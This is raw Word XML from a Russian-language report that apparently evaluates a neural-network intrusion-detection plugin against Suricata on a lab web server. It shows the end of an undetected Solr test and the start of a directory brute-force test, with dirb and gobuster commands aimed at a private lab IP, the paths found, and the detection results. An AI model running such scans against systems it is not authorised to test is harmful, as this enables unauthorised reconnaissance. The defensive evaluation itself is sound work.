          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– Обнаружение нарушения прав доступа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFCD834" w14:textId="77777777" w:rsidR="006605C1" w:rsidRDefault="006605C1" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5490"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1732CE52" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00524F0D" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5490"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00524F0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Логи </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00524F0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Solr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00524F0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> подтвердили, что запрос был получен и обработан. Однако ни нейросетевой плагин, ни классическая </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00524F0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00524F0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> срабатываний не сформировали. Плагин не обнаружил атаку, потому что анализирует метаданные потоков, а не содержимое HTTP запросов. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00524F0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00524F0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> не сработала по причине отсутствия настроенных правил для обнаружения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1321D165" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00524F0D" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="5490"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00524F0D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Данный тест демонстрирует ограничение подхода на основе анализа потоков — для обнаружения атак на уровне содержимого запросов необходима глубокая инспекция пакетов или специализированные сигнатурные правила.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136ACC9C" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00BB36F3"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 же с</w:t>
      </w:r>
      <w:r w:rsidRPr="00276AA9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ледует отметить, что полное закрытие категории A09 требует настройки централизованного сбора и анализа журналов на уровне операционной системы и прикладных сервисов</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB36F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217BA6DC" w14:textId="23A24421" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="004961D0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB36F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Итого: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BB36F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BB36F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — 0 срабатываний, нейросетевой плагин — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB36F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> срабатывани</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB36F3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F843E28" w14:textId="77777777" w:rsidR="000A1CD6" w:rsidRDefault="000A1CD6" w:rsidP="004961D0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FBD1CFE" w14:textId="23855557" w:rsidR="008E0171" w:rsidRPr="000A1CD6" w:rsidRDefault="000A1CD6" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4.8 </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="000A1CD6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Тест 8. Перебор директорий </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350E094D" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="006A2536" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Данная категория охватывает уязвимости, связанные с некорректной настройкой безопасности веб-сервера, при которой злоумышленник может обнаружить скрытые директории и файлы путём автоматизированного перебора. Тестирование проводилось тремя инструментами для обеспечения более широкого охвата.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76879E52"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6A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Первым инструментом тестирования выступил </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — классический инструмент перебора директорий </w:t>
      </w:r>
      <w:r w:rsidRPr="001D324E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>со стандартным словарём, осуществляющий автоматизированный перебор путей на целевом веб-сервере:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F0D168" w14:textId="77777777" w:rsidR="000A1CD6" w:rsidRDefault="000A1CD6" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BD19757" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://192.168.0.104/ -f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8E1E8B" w14:textId="77777777" w:rsidR="009534A2" w:rsidRDefault="009534A2" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42A7BFA5" w14:textId="6330E554"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Процесс обнаружения показан на рисунке 3</w:t>
      </w:r>
      <w:r w:rsidR="009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386FEB04"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3897DCA2" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="386D44F7" wp14:editId="52FB794B">
            <wp:extent cx="5577205" cy="2305050"/>
            <wp:effectExtent l="0" t="0" r="4445" b="0"/>
            <wp:docPr id="140851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1772" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId56"/>
                    <a:srcRect l="54157" t="6991" b="46284"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5577205" cy="2305050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F80712" w14:textId="7449D1F8" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="415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009534A2">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– Обнаружение перебора путей</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A341DAC" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C632B0C"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6A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Инструмент обнаружил следующие директории и файлы: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>config</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/, /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>docs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>/, /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>login.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>index.php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Нейросетевой плагин зафиксировал аномальную активность — резкий рост интенсивности последовательных HTTP GET-запросов характерный для автоматизированного перебора.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737743D9"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6A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Вторым инструментом выступил </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006A2536">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — более быстрый сканер с поддержкой многопоточности:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DD0C4E9" w14:textId="77777777" w:rsidR="000A1CD6" w:rsidRDefault="000A1CD6" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4172C987" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00A10D48" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-u</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://192.168.0.104 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773CC9F2" w14:textId="65A8D17B" w:rsidR="008E0171" w:rsidRPr="00ED4CBB" w:rsidRDefault="008E0171" w:rsidP="009534A2">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">  -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dirb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00A10D48">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/common.txt \</w:t>
      </w:r>
      <w:r w:rsidR="004961D0" w:rsidRPr="004961D0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
